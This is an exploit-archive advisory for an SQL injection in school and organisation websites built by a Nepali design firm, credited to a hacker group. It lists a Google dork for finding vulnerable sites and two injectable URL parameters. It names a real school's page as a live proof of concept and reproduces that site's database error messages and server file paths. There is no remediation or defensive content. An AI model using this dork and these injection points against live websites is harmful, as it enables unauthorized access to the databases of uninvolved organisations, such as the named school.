#################################################################################################
# Exploit Title : Design by Recursive Technologies Inc Nepal SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 03/07/2018
# Vendor Homepage : recursivetechnology.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Design by Recursive Technologies Inc''
# Exploit :
/album.php?aid=[SQL Inj]
/notice.php?nid=[SQL Inj]
#################################################################################################
# Example Site => neighbourhoodschool.edu.np/album.php?aid=6%27 => [ Proof of Concept for SQL Inj ] => archive.is/0juse
# SQL Database Error =>
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /home/neighbou/public_html/album.php on line 8
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /home/neighbou/public_html/album.php on line 28
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /home/neighbou/public_html/album.php on line 41
Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in /home/neighbou/public_html/notice.php on line 9
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################